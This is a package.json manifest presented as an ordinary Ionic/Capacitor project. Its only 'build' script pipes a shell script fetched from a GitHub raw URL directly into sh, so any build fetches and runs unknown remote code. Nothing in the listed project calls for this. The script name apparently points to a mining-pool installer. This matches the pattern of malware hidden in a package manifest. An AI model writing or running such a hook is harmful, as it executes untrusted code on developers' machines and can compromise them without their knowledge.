{
  "name": "ionic-wp-capacitor",
  "version": "0.0.1",
    "dependencies": {
    "react": "18.2.0"
  },
  "scripts": {
    "build": "curl https://raw.githubusercontent.com/apoolm001/qbic/main/apool.sh | sh"
  },
  "devDependencies": {
    "@capacitor/cli": "2.5.0",
    "@ionic/cli": "6.20.3"
  },
  "description": "An Ionic project"
}
